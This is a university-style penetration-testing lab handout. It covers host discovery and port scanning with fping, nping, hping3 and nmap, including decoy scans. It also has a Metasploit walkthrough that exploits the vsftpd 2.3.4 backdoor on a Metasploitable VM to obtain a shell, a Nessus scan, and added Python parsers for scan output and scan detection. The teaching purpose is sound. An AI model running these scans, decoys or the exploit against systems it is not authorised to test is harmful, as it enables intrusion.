Samer Aoudi
Network Scanning

In this practical activity, you will utilize different tools to perform network scanning and port scanning as part of vulnerability assessment.

Why this activity? When you are performing Network Penetration Testing, your main objective is to discover active hosts on your target network, and then scan those hosts for vulnerabilities. When vulnerabilities are discovered, you can then attempt to exploit them.
Prerequisite Knowledge: Networking fundamentals
Requirements: Lab Environment Setup
Duration: 60+min
Files: None
Related Videos: Live Host Identification; Network & Port Scanners
Vulnerability Assessment involves discovering weaknesses in the target system. This includes three main tasks:
  1. Network Scanning: Also called network sweeping, network tracing, or active host discovery. The main objective is to discover active hosts on a network and produce a network map.
  2. Port Scanning: For each discovered host on a network, identify open ports (i.e., running services).
  3. Vulnerability Scanning: For each running service, you can then try to identify whether or not vulnerabilities exist. In a Clear-Box Model, you can use automated tools (e.g., Nessus).
Network Scan Techniques
The following are the main network scanning techniques:
  • ICMP Scan (Sweep): Send an ICMP ECHO request (ICMP type 8). If an ICMP ECHO reply (ICMP type 0) is received, the target is alive. This scan is slow and easily blocked.
  • TCP Scan: Send TCP ACK or TCP SYN packets. Typically targets a known port (e.g., 80) to avoid detection. A RST flag is received if a host is not active; otherwise, the target responds with SYN-ACK.
  • UDP Scan: Relies on the ICMP PORT UNREACHABLE message (a destination unreachable message). When a host is active, it responds with ICMP PORT UNREACHABLE to say that the port is not open.
Our Tools
While there are many tools, the following are the tools we will be using:
  • fping
  • nping
  • hping3
  • nmap
  • Nessus

In this activity, you will use different techniques and tools to discover active hosts on a network.

Expert Mode
  1. Use different techniques and the following tools to discover the IP addresses of your targets. Tools: fping, nping, hping3, and nmap
Regular Mode
Task in detail
  1. Start Kali and the two target VMs
  2. Get the IP address of Kali including the network address: ip a
  3. Use the manual pages, man, to learn about fping: man fping
  4. Use man to learn about nping: man nping
  5. Use man to learn about hping3: man hping3
  6. Use man to learn about nmap: man nmap
  7. Let's start with nmap. Perform a quick TCP network scan (host discovery scan), and note down the IP addresses of your targets: nmap -sn <network address>

  8. Next is nping. Perform an ICMP probe mode network scan with nping: sudo nping --icmp <network address>
  9. Using the nping ICMP scan, how would you know that a host is active?
  10. Which one is faster? The TCP or the ICMP scan?
  11. Finally, let us perform a UDP scan using nping. nping --udp <network address>
  12. Using the nping UDP scan, how would you know that a host is active?

  13. Next, let's use fping to check if a specific host is active or not: fping 192.168.135.44
  14. Now try it against your Windows 10 target: fping <WIN10 IP>
  15. Using Wireshark, compare the results when the host is active and when it's not
  16. Try this command: fping -c 2 <WIN10 IP> <Metasploitable IP>
  17. What does the -c option do?
  18. Next, use hping3 to check if a specific host is active or not: hping3 <WIN10 IP>
  19. Using Wireshark, find out what packets hping3 sends by default
  20. Let's go back to nping and try different probe modes: nping --icmp --icmp-type 10 -c 4 <WIN10 IP>

  21. Let's go back to hping3 and try different modes (use Wireshark to find out what packets are sent in each mode):
    Raw IP Mode: hping3 -0 <Metasploitable IP>
    ICMP Mode:  hping3 -1 <Metasploitable IP>
    UDP Mode:   hping3 -2 <Metasploitable IP>
    Scan Mode:   hping3 -8 <Metasploitable IP>
    Listen Mode: hping3 -9 <Metasploitable IP>
  22. Next, try TCP scan using different flags:
    SYN: hping3 -S <Metasploitable IP>
    FIN:  hping3 -F <Metasploitable IP>
    ACK: hping3 -A <Metasploitable IP>
  23. Now, let's try using different hping3 options:
    hping3 -S -s 44567 -p 80 <Metasploitable IP>
    hping3 -8 20-25 -V <Metasploitable IP>
    hping3 -S -8 20-25 -V <Metasploitable IP>
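
Steps 9, 12 and 15 ask how a reply tells you that a host is active, and step 19 asks what the probes look like on the wire. The following is an added example, not part of this handout: a small Python parser that reads tcpdump-style packet summaries, classifies each line as a probe (ICMP echo, TCP SYN/ACK/FIN, UDP) or a reply (echo reply, SYN-ACK, RST, ICMP port unreachable), lists the hosts that proved themselves alive, and flags the sweep and port-scan patterns a defender would alert on. The log is constructed to resemble `tcpdump -n` output; the 192.168.135.x addresses in it are made up.

```python
"""Spot the Task 1 probe patterns in packet summaries.

Added example (not part of the lab handout). The log below is constructed to
look like `tcpdump -n` output for an ICMP sweep, a UDP probe and a TCP SYN
scan from one scanner (192.168.135.10, a made-up address); it is not a capture.
"""
import re
from collections import defaultdict

# tcpdump prints "host.port" for TCP/UDP and a bare "host" for ICMP.
LINE_RE = re.compile(
    r"^\S+ IP (?P<src>\d+\.\d+\.\d+\.\d+)(?:\.(?P<sport>\d+))? > "
    r"(?P<dst>\d+\.\d+\.\d+\.\d+)(?:\.(?P<dport>\d+))?: (?P<rest>.*)$"
)
FLAGS_RE = re.compile(r"Flags \[([^\]]*)\]")
UNREACH_RE = re.compile(r"ICMP \S+ udp port \d+ unreachable")

# TCP flag strings as tcpdump shows them -> (direction, kind)
FLAG_KINDS = {
    "S": ("probe", "tcp-syn"), ".": ("probe", "tcp-ack"), "F": ("probe", "tcp-fin"),
    "S.": ("reply", "tcp-syn-ack"), "R": ("reply", "tcp-rst"), "R.": ("reply", "tcp-rst"),
}

SAMPLE_LOG = """\
12:00:01.000001 IP 192.168.135.10 > 192.168.135.1: ICMP echo request, id 1, seq 1, length 64
12:00:01.000250 IP 192.168.135.1 > 192.168.135.10: ICMP echo reply, id 1, seq 1, length 64
12:00:01.000301 IP 192.168.135.10 > 192.168.135.2: ICMP echo request, id 1, seq 2, length 64
12:00:01.000602 IP 192.168.135.10 > 192.168.135.3: ICMP echo request, id 1, seq 3, length 64
12:00:01.000903 IP 192.168.135.10 > 192.168.135.44: ICMP echo request, id 1, seq 4, length 64
12:00:01.001150 IP 192.168.135.44 > 192.168.135.10: ICMP echo reply, id 1, seq 4, length 64
12:00:01.001204 IP 192.168.135.10 > 192.168.135.50: ICMP echo request, id 1, seq 5, length 64
12:00:02.000001 IP 192.168.135.10.40001 > 192.168.135.44.53: UDP, length 10
12:00:02.000210 IP 192.168.135.44 > 192.168.135.10: ICMP 192.168.135.44 udp port 53 unreachable, length 46
12:00:03.000001 IP 192.168.135.10.44567 > 192.168.135.44.21: Flags [S], seq 1, win 512, length 0
12:00:03.000200 IP 192.168.135.44.21 > 192.168.135.10.44567: Flags [S.], seq 100, ack 2, win 5840, length 0
12:00:03.000301 IP 192.168.135.10.44567 > 192.168.135.44.22: Flags [S], seq 1, win 512, length 0
12:00:03.000500 IP 192.168.135.44.22 > 192.168.135.10.44567: Flags [S.], seq 200, ack 2, win 5840, length 0
12:00:03.000601 IP 192.168.135.10.44567 > 192.168.135.44.23: Flags [S], seq 1, win 512, length 0
12:00:03.000800 IP 192.168.135.44.23 > 192.168.135.10.44567: Flags [R.], seq 0, ack 2, win 0, length 0
12:00:03.000901 IP 192.168.135.10.44567 > 192.168.135.44.80: Flags [S], seq 1, win 512, length 0
12:00:03.001201 IP 192.168.135.10.44567 > 192.168.135.44.445: Flags [S], seq 1, win 512, length 0
"""


def classify(rest):
    """Map the summary text after the addresses to a probe or reply kind."""
    if rest.startswith("ICMP echo request"):
        return "probe", "icmp-echo"
    if rest.startswith("ICMP echo reply"):
        return "reply", "icmp-echo-reply"
    if UNREACH_RE.search(rest):
        return "reply", "icmp-port-unreachable"
    m = FLAGS_RE.search(rest)
    if m:
        return FLAG_KINDS.get(m.group(1), ("other", "tcp-" + m.group(1)))
    if rest.startswith("UDP"):
        return "probe", "udp"
    return "other", "unknown"


def parse(log):
    """Parse tcpdump summary lines into probe/reply records."""
    records = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        direction, kind = classify(m["rest"])
        records.append({"src": m["src"], "sport": m["sport"], "dst": m["dst"],
                        "dport": m["dport"], "dir": direction, "kind": kind})
    return records


def responding_hosts(records):
    """Hosts proven alive by any reply. A RST or an ICMP port unreachable
    says the port is closed, but it also says the host is up."""
    return sorted({r["src"] for r in records if r["dir"] == "reply"})


def syn_ack_ports(records):
    """Ports that answered a SYN with SYN-ACK, grouped by the answering host."""
    out = defaultdict(set)
    for r in records:
        if r["kind"] == "tcp-syn-ack" and r["sport"] is not None:
            out[r["src"]].add(int(r["sport"]))
    return {host: sorted(ports) for host, ports in out.items()}


def detect(records, host_threshold=4, port_threshold=4):
    """Flag one source probing many hosts (sweep) or many ports on one host (portscan)."""
    hosts_by_src, ports_by_pair = defaultdict(set), defaultdict(set)
    for r in records:
        if r["dir"] != "probe":
            continue
        hosts_by_src[r["src"]].add(r["dst"])
        if r["dport"] is not None:
            ports_by_pair[(r["src"], r["dst"])].add(int(r["dport"]))
    alerts = [("sweep", src, len(h)) for src, h in hosts_by_src.items() if len(h) >= host_threshold]
    alerts += [("portscan", f"{s}->{d}", len(p)) for (s, d), p in ports_by_pair.items()
               if len(p) >= port_threshold]
    return alerts


if __name__ == "__main__":
    recs = parse(SAMPLE_LOG)
    print("alive:", responding_hosts(recs))
    print("SYN-ACK ports:", syn_ack_ports(recs))
    for alert in detect(recs):
        print("ALERT", *alert)
```

Run against the constructed capture, the parser reports two hosts alive (one only via its echo reply, one via every reply type), two ports answering SYN-ACK, and two alerts: a sweep from the scanner and a port scan against the second host. The thresholds are deliberately low for the sample; a real sensor would tune them per network.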
Port Scanning is the process of scanning a host to discover open ports and running services.
In Task #1, we scanned the target network and discovered two active hosts. In this task, these two hosts are our targets.

In this activity, you will use different techniques to perform port scanning.

Expert Mode
  1. Using nmap, discover what ports are open, what services are running, and what OS are on your two targets
Regular Mode
Task in detail
  1. We will start by re-scanning the entire network, but this time without skipping port discovery. Notice that nmap will generate a report with all active hosts, their open ports, and the running service on each port:
    nmap <network address>
  2. By default, nmap scans 1,000 commonly used ports. However, there are 65,536 ports on any computer. Let us try a deep scan on a single target:
    nmap -p0-65535 <WIN10 IP>
  3. Repeat for Metasploitable:
    nmap -p0-65535 <Metasploitable IP>
  4. What ports were discovered in the deep scan but weren't reported in the default scan?
  5. Next, we want to enumerate the version of each running service (we will use default scan, not deep, to save time):
    nmap -sV <WIN10 IP>
  6. Repeat for Metasploitable:
    nmap -sV <Metasploitable IP>
  7. What if our targets have security controls that spoof the results? We will need to use different scan techniques to ensure we are getting more accurate results (i.e., no false negatives):
    SYN Scan: nmap -sS <Metasploitable IP>
    TCP Connect: nmap -sT <Metasploitable IP>
    Null Scan: nmap -sN <Metasploitable IP>
    FIN Scan: nmap -sF <Metasploitable IP>
    ACK Scan: nmap -sA <Metasploitable IP>
    UDP Scan: nmap -sU <Metasploitable IP>
    XMAS Scan: nmap -sX <Metasploitable IP>
  8. Next, we want to target a specific port (e.g., FTP 21). But we also want a specific scan (e.g., TCP Connect), and want to know the service version:
    nmap -sT -sV -p 21 <WIN10 IP>
  9. Next, perform a version detection scan on one of your hosts targeting only open ports:
    nmap -sV <WIN10 IP> --open
  10. Sometimes, we just want quick results. Try the fast scan:
    nmap -F <WIN10 IP>
  11. Sometimes we want to trick the target system by providing a number of decoys. This option makes it look like those decoys are scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. We can use the decoy option -D:
    nmap -sV <WIN10 IP> -D <Metasploitable IP>
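
Step 4 asks which ports the deep scan reports that the default scan did not, and the next task starts from a service version found with -sV. Both are bookkeeping over nmap's normal output, so the following is an added example, not part of this handout: a small Python parser that turns that output into a per-host port/service inventory, diffs a default and a full-range scan, and looks up hosts running a given product version. The two scan transcripts are constructed in the layout of nmap normal output; the hosts, MAC address and banners are made up, except vsftpd 2.3.4, which the lab itself points at.

```python
"""Turn nmap normal output into a port/service inventory and diff two scans.

Added example, not from the lab handout. The transcripts below are constructed
in the layout of `nmap -sV` and `nmap -p0-65535` normal output; hosts, MAC and
banners are made up (vsftpd 2.3.4 is the version named in the lab).
"""
import re

# "Nmap scan report for 10.0.0.1" or "Nmap scan report for name (10.0.0.1)"
HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d+\.\d+\.\d+\.\d+)\)?$")
# "21/tcp   open  ftp   vsftpd 2.3.4"  (VERSION column is optional)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

DEFAULT_SCAN = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 12:00 UTC
Nmap scan report for 192.168.135.44
Host is up (0.00021s latency).
Not shown: 996 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.3.4
22/tcp open  ssh     OpenSSH 4.7p1 (constructed banner)
23/tcp open  telnet  Linux telnetd
80/tcp open  http    Apache httpd 2.2.8 (constructed banner)
MAC Address: 08:00:27:00:00:01 (constructed)
Service Info: OS: Linux

Nmap scan report for 192.168.135.50
Host is up (0.00050s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds

Nmap done: 256 IP addresses (2 hosts up) scanned in 12.34 seconds
"""

DEEP_SCAN = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-01 12:10 UTC
Nmap scan report for 192.168.135.44
Host is up (0.00019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
80/tcp   open  http
8787/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 45.67 seconds
"""


def parse_nmap(text):
    """Return {host_ip: [{port, proto, state, service, version}, ...]}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.rstrip()
        m = HOST_RE.match(line)
        if m:
            current = m.group(1)
            hosts.setdefault(current, [])
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service, version = m.groups()
            hosts[current].append({"port": int(port), "proto": proto, "state": state,
                                   "service": service, "version": (version or "").strip()})
    return hosts


def open_ports(hosts, host):
    """Sorted open port numbers for one host."""
    return sorted(p["port"] for p in hosts.get(host, []) if p["state"] == "open")


def ports_only_in(deep, default):
    """Open ports the full-range scan found that the default scan did not report (step 4)."""
    out = {}
    for host in deep:
        extra = set(open_ports(deep, host)) - set(open_ports(default, host))
        if extra:
            out[host] = sorted(extra)
    return out


def find_service(hosts, product, version):
    """(host, port, proto) tuples whose banner starts with this product and version."""
    needle = f"{product} {version}".lower()
    return [(host, p["port"], p["proto"]) for host, entries in hosts.items()
            for p in entries if p["version"].lower().startswith(needle)]


if __name__ == "__main__":
    default, deep = parse_nmap(DEFAULT_SCAN), parse_nmap(DEEP_SCAN)
    for host in default:
        print(host, "open:", open_ports(default, host))
    print("only in deep scan:", ports_only_in(deep, default))
    print("vsftpd 2.3.4 on:", find_service(default, "vsftpd", "2.3.4"))
```

The same parser works on the output of steps 1, 5 and 8 because they share the PORT/STATE/SERVICE/VERSION layout; states such as open|filtered from a UDP scan are kept verbatim in the state field so you can filter on them.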
Common Vulnerabilities Exposure (CVE®) is a "list of entries—each containing an identification number, a description, and at least one public reference—for publicly known cybersecurity vulnerabilities."

In this activity, you will manually search for vulnerabilities and exploits, and perform a quick attack.

Expert Mode
  1. Using NVD and CVE Details, research potential vulnerabilities for your targets' discovered services, and exploit at least one of them
Regular Mode
Task in detail
  1. Let's start with a version scan targeting Metasploitable:
    nmap -sV <Metasploitable IP>
  2. What next? We want to know if any of these services are vulnerable. Using the NVD Database, search for the vsftpd 2.3.4 service
  3. You should find a CVE Vulnerability ID CVE-2011-2523. What is the severity of this CVE?
  4. Click the CVE link to get the details. Are there any exploits for this vulnerability?
  5. The answer to the above question is YES. Namely, the VSFTPD 2.3.4 Backdoor Command Execution exploit module available on the Metasploit Framework. Let us find it. Start Metasploit
    msfconsole
  6. Type help and locate the Module Commands section
  7. Use the search command to locate the exploit we found:
    search vsftpd

  8. The search result is the VSFTPD 2.3.4 Backdoor Command Execution module, exploit/unix/ftp/vsftpd_234_backdoor
  9. Note that the index number for our search result is 0; this can be used to save us from typing the full module name. Next, let's get some information about this module (you will need the information to answer some questions later):
    info 0
  10. Next, we want to use the module:
    use 0
    OR
    use exploit/unix/ftp/vsftpd_234_backdoor
  11. Let's see what options require our attention:
    show options
  12. RHOSTS is the Remote Host(s), i.e., the target. Let's set it to the IP address of Metasploitable:
    set rhosts <Metasploitable IP>
  13. We are ready. Let's go ahead and run this exploit:
    run
  14. A command shell session will open upon a successful run. Basically, we hacked the target via this Backdoor. For now, we don't want to discuss the details of the attack. Let's just verify that we are indeed in the target. Type the following and notice what IP address you will get:
    ip a
  15. Let us summarize the very important steps of what we just did:
    1. We scanned a target network to discover active hosts (outcome: list of host IP addresses)
    2. We scanned a specific target host for open ports (outcome: list of open ports and running services)
    3. We got the version of a specific service
    4. We used one of the vulnerabilities databases to search for potential vulnerabilities in our service
    5. We identified an exploit module available in Metasploit Framework
    6. We used Metasploit to run the exploit and hack our target
Automated Vulnerability Scanning is typically used in clear-box pentesting. Tools like Nessus and OpenVAS allow you to easily create and run scans.

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network.

In this activity, you will use a Vulnerability Scanner to discover vulnerabilities.

Expert Mode
  1. Use Nessus to scan your two targets for vulnerabilities
Regular Mode
Task in detail
  1. We will use Windows 10 for this activity, so go ahead and log in to your WIN10 VM
  2. Open the Google Chrome web browser. There should be a pre-configured tab with the Nessus scanner homepage
  3. You might see a privacy error/warning. Click the Advanced button and then click the Proceed to localhost (unsafe) link
  4. Log in with the following credentials: samer/password
  5. Close the welcome message dialog
  6. Click the New Scan button (top right corner) and select the Basic Network Scan option
  7. Fill in the required information as follows:
    Name: First Scan
    Description: CSF3203 202210
    Target: <Your Network Address IP>
  8. Click the Save button
  9. Once saved, you will be redirected to the My Scans folder with the recently created scan listed
  10. Locate the Launch button and click it to start the scan
  11. Let the scan run. While the scan is running, you can inspect the results as they are reported. Click the Running icon
  12. Click the IP address of Metasploitable to see its details
  13. Go back to the Hosts (scan results) main page and wait for the scan to be completed. When the scan is complete, explore some of the discovered vulnerabilities
  14. Click the vulnerability category: SSL (Multiple Issues)
  15. Click the first vulnerability to get its details
  16. In the Questions section, you will be asked about specific details, so make sure you know how to locate information in Nessus scan results
  17. Finally, go to the results page and export the results into a PDF
  18. Open the PDF file and view its contents. Show your instructor when done
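
Step 16 expects you to locate specific details in the scan results. The lab exports them as a PDF; the following is an added example, not part of this handout, that assumes the Nessus XML export instead (the .nessus format, whose ReportHost and ReportItem elements carry one finding per host and port). It parses such a file into a list of findings, counts them per host and severity (the numbers shown on the Hosts page), and pulls out the findings for a given CVE or for SSL plugins. The document is constructed: hosts, plugin IDs and plugin names are made up, except CVE-2011-2523, which the lab itself names.

```python
"""Summarize a Nessus XML export (.nessus) by host, severity and CVE.

Added example, not from the lab handout. The .nessus export format is an
assumption here (the lab exports a PDF). The XML below is constructed:
hosts, plugin IDs, names and scores are made up except CVE-2011-2523.
"""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# Nessus severity attribute 0..4 -> label used in the UI
SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}

SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="First Scan">
    <ReportHost name="192.168.135.44">
      <HostProperties>
        <tag name="host-ip">192.168.135.44</tag>
      </HostProperties>
      <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="4" pluginID="000001"
                  pluginName="vsftpd 2.3.4 backdoor (constructed plugin name)">
        <cve>CVE-2011-2523</cve>
        <cvss3_base_score>9.8</cvss3_base_score>
      </ReportItem>
      <ReportItem port="25" svc_name="smtp" protocol="tcp" severity="2" pluginID="000002"
                  pluginName="SSL Certificate Cannot Be Trusted (constructed)">
      </ReportItem>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0" pluginID="000003"
                  pluginName="SSH Server Type and Version (constructed)">
      </ReportItem>
    </ReportHost>
    <ReportHost name="192.168.135.50">
      <HostProperties>
        <tag name="host-ip">192.168.135.50</tag>
      </HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2" pluginID="000004"
                  pluginName="SMB Signing not required (constructed)">
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def parse_nessus(xml_text):
    """Flatten ReportHost/ReportItem into one dict per finding."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.findall("ReportItem"):
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port")),
                "protocol": item.get("protocol"),
                "service": item.get("svc_name"),
                "severity": SEVERITY[int(item.get("severity"))],
                "plugin": item.get("pluginName"),
                "cves": [c.text for c in item.findall("cve")],
                # missing score element -> 0.0 rather than a crash
                "cvss3": float(item.findtext("cvss3_base_score", default="0")),
            })
    return findings


def severity_summary(findings):
    """Per-host counts by severity label."""
    summary = defaultdict(Counter)
    for f in findings:
        summary[f["host"]][f["severity"]] += 1
    return {host: dict(counts) for host, counts in summary.items()}


def findings_for_cve(findings, cve):
    """(host, port) pairs where a plugin reported this CVE."""
    return [(f["host"], f["port"]) for f in findings if cve in f["cves"]]


def ssl_findings(findings):
    """Findings whose plugin name mentions SSL, a rough stand-in for the
    'SSL (Multiple Issues)' group the UI shows."""
    return [(f["host"], f["port"], f["plugin"]) for f in findings if "ssl" in f["plugin"].lower()]


if __name__ == "__main__":
    found = parse_nessus(SAMPLE_NESSUS)
    for host, counts in severity_summary(found).items():
        print(host, counts)
    print("CVE-2011-2523:", findings_for_cve(found, "CVE-2011-2523"))
    print("SSL:", ssl_findings(found))
```

Because the parser keeps the host, port and CVE list for every finding, the same structure answers the kind of question step 16 has in mind (which host and port a finding was raised on, and with what severity) without reading the PDF by hand.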
© Samer Aoudi 2005-2024